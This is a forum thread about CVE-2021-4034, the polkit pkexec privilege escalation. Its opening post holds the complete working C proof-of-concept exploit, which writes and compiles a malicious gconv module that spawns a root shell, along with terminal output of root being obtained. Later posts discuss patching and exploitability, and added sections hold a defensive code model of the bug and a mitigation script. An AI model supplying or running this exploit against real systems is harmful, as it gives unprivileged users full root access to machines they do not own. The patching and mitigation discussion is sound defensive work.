CVE-2021-4034 - Polkitd privilege escalation (HIGH VULN)

FoxelVox Member
edited January 26 in General

Hi LET community,

A new CVE has come to light in polkit's pkexec calls. It allows any user to become a root user:

The exploit is also given in the example, and it works unfortunately on my Ubuntu 20 machine;

[email protected]:~$ gcc test.c -o a
[email protected]:~$ ./a
[~] compile helper..
[~] maybe get shell now?
# id
uid=0(root) gid=0(root) groups=0(root),116(lxd),1010(randomuser)

Redhat/CentOS/Alma/etc CVE patch:

Debian/UB CVE patch:


For anyone that wants to try the exploit:

/*
 * blasty-vs-pkexec.c -- by blasty <[email protected]> 
 * ------------------------------------------------
 * PoC for CVE-2021-4034, shout out to Qualys
 *
 * ctf quality exploit
 *
 * bla bla irresponsible disclosure
 *
 * -- blasty // 2022-01-25
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>

void fatal(char *f) {
    perror(f);
    exit(-1);
}

/* Write and build the fake gconv module. glibc's iconv calls gconv_init()
 * as soon as it dlopen()s the module, and by then pkexec is running as
 * root, so that is where the shell is spawned. */
void compile_so() {
    FILE *f = fopen("payload.c", "wb");
    if (f == NULL) {
        fatal("fopen");
    }

    char so_code[]=
        "#include <stdio.h>\n"
        "#include <stdlib.h>\n"
        "#include <unistd.h>\n"
        "void gconv() {\n"
        "  return;\n"
        "}\n"
        "void gconv_init() {\n"
        "  setuid(0); seteuid(0); setgid(0); setegid(0);\n"
        "  static char *a_argv[] = { \"sh\", NULL };\n"
        "  static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
        "  execve(\"/bin/sh\", a_argv, a_envp);\n"
        "  exit(0);\n"
        "}\n";

    fwrite(so_code, strlen(so_code), 1, f);
    fclose(f);

    /* Needs gcc on the box; a prebuilt payload.so dropped next to the
     * exploit works just as well. */
    system("gcc -o payload.so -shared -fPIC payload.c");
}

int main(int argc, char *argv[]) {
    struct stat st;
    /* argc == 0: pkexec's argv[0] is NULL and its argv[1] aliases envp[0]. */
    char *a_argv[]={ NULL };
    char *a_envp[]={
        "lol",                      /* envp[0]: pkexec reads it as argv[1], the program to run */
        "PATH=GCONV_PATH=.",        /* PATH lookup of "lol" yields "GCONV_PATH=./lol", which
                                       pkexec writes back over envp[0], injecting GCONV_PATH */
        "LC_MESSAGES=en_US.UTF-8",  /* locale setting that makes GLib push the error
                                       message below through iconv */
        "XAUTHORITY=../LOL",        /* fails pkexec's environment check, forcing that message */
        NULL
    };

    printf("[~] compile helper..\n");
    compile_so();

    /* Directory literally named "GCONV_PATH=." holding an executable file
     * "lol", so the PATH search above succeeds. */
    if (stat("GCONV_PATH=.", &st) < 0) {
        if(mkdir("GCONV_PATH=.", 0777) < 0) {
            fatal("mkdir");
        }
        int fd = open("GCONV_PATH=./lol", O_CREAT|O_RDWR, 0777); 
        if (fd < 0) {
            fatal("open");
        }
        close(fd);
    }

    /* Directory "lol" (the injected GCONV_PATH) with a gconv-modules file
     * mapping UTF-8 to ../payload, i.e. the payload.so built above. */
    if (stat("lol", &st) < 0) {
        if(mkdir("lol", 0777) < 0) {
            fatal("mkdir");
        }
        FILE *fp = fopen("lol/gconv-modules", "wb");
        if(fp == NULL) {
            fatal("fopen");
        }
        fprintf(fp, "module  UTF-8//    INTERNAL    ../payload    2\n");
        fclose(fp);
    }

    printf("[~] maybe get shell now?\n");

    /* Run pkexec with an empty argv. A shell never does this, which is
     * why the bug sat unnoticed since 2009. */
    execve("/usr/bin/pkexec", a_argv, a_envp);
    fatal("execve");    /* only reached if pkexec could not be started */
}

Comments

  • jsg Member, Resident Benchmarker

    Lovely

    Thanked by FoxelVox, bdl
  • - pkexec is installed by default on all major Linux distributions (we
      exploited Ubuntu, Debian, Fedora, CentOS, and other distributions are
      probably also exploitable);
    
    - pkexec is vulnerable since its creation, in May 2009 (commit c8c3d83,
      "Add a pkexec(1) command");
    
    - any unprivileged local user can exploit this vulnerability to obtain
      full root privileges;
    
    

    Wow.

    Thanked by FoxelVox
  • PulsedMedia Member, Patron Provider

    That's quite epic :O

    Had to instantly check, no we do not have pkexec installed on our servers :)

    Thanked by FoxelVox
  • @PulsedMedia said:
    That's quite epic :O

    Had to instantly check, no we do not have pkexec installed on our servers :)

    Ah, that's great to see :D ! I just updated and tested all my servers, patched 11/14 I own, quite a lot honestly. I'm surprised this isn't a higher CVE rating. Yeah, you can easily patch it without downtime, but the impact can be extreme, because it's this easy to gain root access.

  • vovler Member
    edited January 26

    I wonder if going with a minimal install would not include pkexec, making the minimal version more secure than the non-minimal version of the distro.

  • There was another one just a few days ago https://sysdig.com/blog/cve-2022-0185-container-escape/

    Thanked by PulsedMedia
  • ariq01 Member
    edited January 26

    I've checked on DirectAdmin and cPanel (with the CloudLinux version). Not successfully compiled, since pkexec: command not found in user shell access.

    But it successfully gets into a shell on my VPS, maybe because of this point

    - any unprivileged local user can exploit this vulnerability to obtain
      full root privileges;
    
  • raindog308 Administrator

    But where's the cool name, logo and web site?

    Heartbleed, Log4Shell, Spectre - vulnerabilities these days are expected to have a brand.

    I suggest...hmmm...maybe PolDancer.

  • PulsedMedia Member, Patron Provider

    @ariq01 said:
    I've checked on DirectAdmin and cPanel (with the CloudLinux version). Successfully compiled, but can't get to a shell, since pkexec: command not found in user shell access.

    But it successfully gets into a shell on my VPS, maybe because of this point

    - any unprivileged local user can exploit this vulnerability to obtain
    full root privileges;

    but did you check id once on that shell?

  • raindog308 Administrator

    @FoxelVox said: Debian/UB CVE patch:

    Just checked and none of my Debian 11 VMs are running polkit, or even have the package installed, and the exploit doesn't work there.

    My home Deb 11 systems are running polkitd and the exploit works there (just tested).

    I'm thinking you need to have a GUI running to have polkitd installed and vulnerable. Might be a Debian config quirk.

    At least I don't have to worry about my 12-year-old getting root. She would use ransomware to get a better phone.

    Thanked by FoxelVox, PulsedMedia
  • @PulsedMedia said:
    but did you check id once on that shell?

    I mean, it's not compiled on CloudLinux.
    Here is the result:

    [[email protected] test]$ gcc test.c -o a
    test.c: In function ‘compile_so’:
    test.c:42:9: warning: missing terminating " character [enabled by default]
    " static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL
    ^
    test.c:42:9: error: missing terminating " character
    test.c:43:1: error: expected ‘,’ or ‘;’ before ‘}’ token
    };\n"
    ^
    test.c:43:1: error: stray ‘\’ in program
    test.c:43:5: warning: missing terminating " character [enabled by default]
    };\n"
    ^
    test.c:43:1: error: missing terminating " character
    };\n"
    ^
    test.c:43:4: error: ‘n’ undeclared (first use in this function)
    };\n"
    ^
    test.c:43:4: note: each undeclared identifier is reported only once for each function it appears in
    test.c:44:9: error: expected ‘;’ before string constant
    " execve(\"/bin/sh\", a_argv, a_envp);\n"

  • Boogeyman Member
    edited January 26

    Last year Qualys revealed a similar kind of vulnerability in sudo that had existed for almost a decade. They really like old things. Oops, this is also from last year. The CVE is 2021-4034.

  • darkimmortal Member
    edited January 26

    @raindog308 said:

    @FoxelVox said: Debian/UB CVE patch:

    Just checked and none of my Debian 11 VMs are running polkit, or even have the package installed, and the exploit doesn't work tehre.

    My home Deb 11 systems are running polkitd and the exploit works there (just tested).

    I'm thinking you need to have a GUI running to have polkitd installed and vulnerable. Might be a Debian config quirk.

    At least I don't have to worry about my 12-year-old getting root. She would use ransomware to get a better phone.

    Libvirtd has a dependency on polkit in Debian. VMs might not be vulnerable but the host systems are. I don’t know why this dependency exists, but it is not just a GUI thing

  • Neoon Member
    edited January 26

    @babuum said:
    There was another one just a few days ago https://sysdig.com/blog/cve-2022-0185-container-escape/

    patch state: ✓ all applicable livepatch modules inserted
    Premium live patching indeed.

    • pkexec is vulnerable since its creation, in May 2009

    Excellent. Wonderful.

    Also Log4j has a companion now.

  • @jmaxwell said:
    Also Log4j has a companion now.

    Why?

  • @Neoon said:

    @babuum said:
    There was another one just a few days ago https://sysdig.com/blog/cve-2022-0185-container-escape/

    patch state: ✓ all applicable livepatch modules inserted
    Premium live patching indeed.

    We must be due for an Incredible Hulk tv show remake. I'd watch it just to see that bear look real and still thrown across the lake.

  • Shot2 Member

    Another instance of "if the attackers gain access to the Oval Office, they could do nasty things, omg"

  • Gcc has to be installed first.
    Learning the hard way to "install only what's needed" on your server. Even if the unneeded application doesn't have a bug, it can be used to exploit another app's bug.

  • AlwaysSkint Member
    edited January 28

    @NanoG6 said: "install only what's needed" on your server

    Better not use Ubuntu! ;) :p

    Thanked by TimboJones
  • jon617 Member
    edited January 28

    Thanks for the exploit example, @FoxelVox

    I'm starting to see centos and ubuntu package mirrors getting package updates today. After updating, my CentOS 7 and Ubuntu 20 machines are no longer exploitable. I bet other distros also have updates today.

  • @NanoG6 said:
    Gcc has to be installed first.

    Why?

  • @babuum said:

    @NanoG6 said:
    Gcc has to be installed first.

    Why?

    because

    [[email protected] ~]$ ./cve 
    [~] compile helper..
    sh: gcc: command not found
    [~] maybe get shell now?
    GLib: Cannot convert message: Conversion from character set “UTF-8” to “ANSI_X3.4-1968” is not supported
    The value for environment variable XAUTHORITY contains suscipious content
    
    This incident has been reported.
    [[email protected] ~]$ id
    uid=1000(scylla) gid=1000(scylla) groups=1000(scylla)
    [[email protected] ~]$ 
    
  • @AlwaysSkint said:

    @NanoG6 said: "install only what's needed" on your server

    Better not use Ubuntu! ;) :p

    Well I'm using minimal CentOS, and the exploit unfortunately works. (not so minimal, because I had to install gcc first)

    Thanked by AlwaysSkint
  • nem Member, Host Rep

    @NanoG6 said:

    @babuum said:

    @NanoG6 said:
    Gcc has to be installed first.

    Why?

    because

    An attacker could always upload that compiled library (payload.so) to a server. gcc is required in the PoC for thoroughness. pkexec should spit out help without any arguments but uses gconv to handle encoding, which can load a library, so gcc really doesn't have any part in how the exploit works.

    It's a nasty nasty exploit.
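
The mechanism nem describes above, that the bug is entirely in how pkexec treats its arguments and gcc is incidental, is easier to see in miniature. What follows is an added example, not code from this thread or from polkit: it models pkexec's "resolve argv[1] through PATH and write the result back" step over a simulated process stack, with the argc guard the upstream fix introduced next to it. find_program_in_path, fake_files and the four-slot stack array are stand-ins invented for the demo; the real pkexec calls g_find_program_in_path and the real stack is whatever the kernel lays out for execve.

```c
/* Added example, not code from the thread or from polkit: a stand-alone model
 * of the argv handling that CVE-2021-4034 abuses, next to the argc check the
 * fix added. The process "stack" is a plain array laid out the way execve()
 * leaves it: argv[0..argc-1], NULL, envp[0..], NULL. The filesystem is a
 * fixed list of paths (an assumption for the demo). */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The only file that "exists" for the PATH search: the one the PoC creates. */
static const char *fake_files[] = { "GCONV_PATH=./lol", NULL };

/* Toy stand-in for g_find_program_in_path(): first "dir/name" hit in PATH. */
static char *find_program_in_path(const char *name, const char *path_env) {
    if (path_env == NULL) return NULL;
    char *copy = strdup(path_env), *save = NULL, *hit = NULL;
    for (char *dir = strtok_r(copy, ":", &save); dir && !hit; dir = strtok_r(NULL, ":", &save)) {
        size_t n = strlen(dir) + 1 + strlen(name) + 1;
        char *cand = malloc(n);
        snprintf(cand, n, "%s/%s", dir, name);
        for (const char **f = fake_files; *f && !hit; f++)
            if (strcmp(*f, cand) == 0) hit = cand;
        if (!hit) free(cand);
    }
    free(copy);
    return hit;
}

/* getenv("PATH") over an explicit envp array. */
static const char *env_path(char **envp) {
    for (char **e = envp; *e; e++)
        if (strncmp(*e, "PATH=", 5) == 0) return *e + 5;
    return NULL;
}

/* Vulnerable shape of pkexec's main(): the option loop starts n at 1, argv[n]
 * is the program to run, and a relative name is resolved through PATH with the
 * result written back into argv[n]. With argc == 0, argv[0] is NULL and
 * argv[1] is envp[0], so both the read and the write land in the environment. */
int pkexec_vuln(int argc, char **argv, char **envp) {
    int n = 1;                      /* real code: for (n = 1; n < argc; n++) ... */
    (void)argc;
    char *path = argv[n];           /* out-of-bounds read when argc == 0 */
    if (path == NULL) return 127;   /* "no command given" */
    if (path[0] != '/') {
        char *s = find_program_in_path(path, env_path(envp));
        if (s == NULL) return 127;
        argv[n] = s;                /* out-of-bounds write: envp[0] becomes GCONV_PATH=./lol */
    }
    return 0;
}

/* Hardened shape: the upstream fix refuses to continue when argc < 1. */
int pkexec_fixed(int argc, char **argv, char **envp) {
    if (argc < 1) return 127;
    return pkexec_vuln(argc, argv, envp);
}

/* The layout execve("/usr/bin/pkexec", {NULL}, {"lol", "PATH=GCONV_PATH=.", NULL})
 * produces: argv = stack, envp = stack + 1. */
void build_argc0_stack(char *stack[4]) {
    stack[0] = NULL;                 /* argv[0]: argc is 0 */
    stack[1] = "lol";                /* envp[0]: what pkexec mistakes for argv[1] */
    stack[2] = "PATH=GCONV_PATH=.";  /* envp[1]: PATH is the attacker's directory */
    stack[3] = NULL;
}

/* 1 if the argc == 0 layout lets the vulnerable code rewrite envp[0]. */
int demo_vuln_rewrites_env(void) {
    char *stack[4];
    build_argc0_stack(stack);
    int rc = pkexec_vuln(0, stack, stack + 1);
    return rc == 0 && strcmp(stack[1], "GCONV_PATH=./lol") == 0;
}

/* 1 if the fixed code rejects argc == 0 and leaves the environment alone. */
int demo_fixed_rejects(void) {
    char *stack[4];
    build_argc0_stack(stack);
    int rc = pkexec_fixed(0, stack, stack + 1);
    return rc == 127 && strcmp(stack[1], "lol") == 0;
}

/* 1 if a normal invocation (argc == 2) behaves the same in both versions. */
int demo_normal_invocation_ok(void) {
    char *stack[] = { "pkexec", "/bin/true", NULL, "PATH=/usr/bin", NULL };
    return pkexec_vuln(2, stack, stack + 3) == 0 &&
           pkexec_fixed(2, stack, stack + 3) == 0 &&
           strcmp(stack[3], "PATH=/usr/bin") == 0;
}

int main(void) {
    printf("vulnerable rewrites envp[0]: %s\n", demo_vuln_rewrites_env() ? "yes" : "no");
    printf("fixed rejects argc==0:       %s\n", demo_fixed_rejects() ? "yes" : "no");
    printf("argc==2 unaffected:          %s\n", demo_normal_invocation_ok() ? "yes" : "no");
    return 0;
}
```

What the rewrite buys the attacker in the real thing: once envp[0] reads GCONV_PATH=./lol, pkexec's later complaint about XAUTHORITY goes out through g_printerr, whose charset conversion asks glibc's iconv for a gconv module, and iconv honours GCONV_PATH. The PoC's lol/gconv-modules file then points UTF-8 at ../payload, which is the payload.so compile_so() built, and gconv_init() runs as root. That is also why the run without gcc in this thread stops at "Cannot convert message": the module path is set up but there is no library behind it.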

  • AlwaysSkint Member
    edited January 28

    @nem said: It's a nasty nasty exploit.

    Cue: 999 - Nasty, Nasty :)
    https://youtu.be/4NxXjEPqOls

  • jon617 Member
    edited January 29

    @NanoG6 said: Well I'm using minimal CentOS, and the exploit unfortunately works.

    Yeah. My original thought was just remove polkit or get rid of its root sticky bit permission, but NetworkManager seemed to depend on it. Glad the package updates came so quickly.
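
Several posts above amount to the same checklist: PulsedMedia looked whether pkexec is present at all, raindog308 and darkimmortal found polkit pulled in by things like libvirtd rather than only by a GUI, and jon617 considered dropping the setuid bit but hit the NetworkManager dependency. The script below is an added example, not something posted in the thread, that does those three checks on one host and can apply the interim chmod that Qualys recommended until the distro package lands. Assumptions: pkexec lives at /usr/bin/pkexec, and the package is policykit-1 on Debian/Ubuntu of that era or polkit on RHEL/CentOS/Alma; both can be overridden through the environment.

```shell
#!/bin/sh
# Added example, not from the thread: audit one host for the setuid pkexec that
# CVE-2021-4034 needs, list what depends on the polkit package, and optionally
# apply the stop-gap (strip the setuid bit) until the distro patch is installed.
# Assumptions: pkexec is at /usr/bin/pkexec; the package is policykit-1
# (Debian/Ubuntu) or polkit (RHEL/CentOS/Alma). Override via env if different.
PKEXEC="${PKEXEC:-/usr/bin/pkexec}"
DEB_PKG="${DEB_PKG:-policykit-1}"
RPM_PKG="${RPM_PKG:-polkit}"

# Prints one of: absent | setuid | not-setuid
pkexec_status() {
    if [ ! -e "$1" ]; then
        echo absent
    elif [ -u "$1" ]; then
        echo setuid
    else
        echo not-setuid
    fi
}

# Installed polkit package and version, to match against the distro advisory.
pkexec_version() {
    if command -v dpkg-query >/dev/null 2>&1; then
        dpkg-query -W -f='${Package} ${Version}\n' "$DEB_PKG" 2>/dev/null || true
    elif command -v rpm >/dev/null 2>&1; then
        rpm -q "$RPM_PKG" 2>/dev/null || true
    fi
}

# Installed packages that depend on polkit. Removing it is rarely an option
# (libvirtd, NetworkManager and friends pull it in), which is why the chmod
# below is the usual interim fix rather than an uninstall.
pkexec_rdeps() {
    if command -v apt-cache >/dev/null 2>&1; then
        apt-cache rdepends --installed "$DEB_PKG" 2>/dev/null || true
    elif command -v rpm >/dev/null 2>&1; then
        rpm -q --whatrequires "$RPM_PKG" 2>/dev/null || true
    fi
}

# Qualys' interim mitigation: chmod 0755 on pkexec. pkexec stops working for
# everyone, but nobody gets root through it. Upgrading the package afterwards
# restores the setuid mode. Needs root on a real host.
mitigate_pkexec() {
    [ "$(pkexec_status "$1")" = setuid ] || return 0
    chmod 0755 "$1" && echo "stripped setuid bit from $1" \
        || echo "chmod failed on $1 (need root?)" >&2
}

main() {
    status=$(pkexec_status "$PKEXEC")
    echo "$PKEXEC: $status"
    case "$status" in
        absent)     echo "pkexec not installed; nothing to do" ;;
        not-setuid) echo "setuid bit already removed; exploit has nothing to run as root" ;;
        setuid)
            echo "package: $(pkexec_version)"
            echo "installed reverse dependencies:"
            pkexec_rdeps
            if [ "${APPLY:-0}" = 1 ]; then mitigate_pkexec "$PKEXEC"; fi
            ;;
    esac
    return 0
}

main "$@"
```

Run it as is to report; run it as root with APPLY=1 to strip the bit. Keep in mind that the chmod is only a bridge: the thread's own observation that the package updates appeared within days is the real fix, and the upgrade puts the setuid bit back on a pkexec that checks argc.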

  • @AlwaysSkint said:

    @nem said: It's a nasty nasty exploit.

    Cue: 999 - Nasty, Nasty :)
    https://youtu.be/4NxXjEPqOls

    Clicking on random yt link described as "Nasty, Nasty" is rarely a good idea. >:)

    Thanked by AlwaysSkint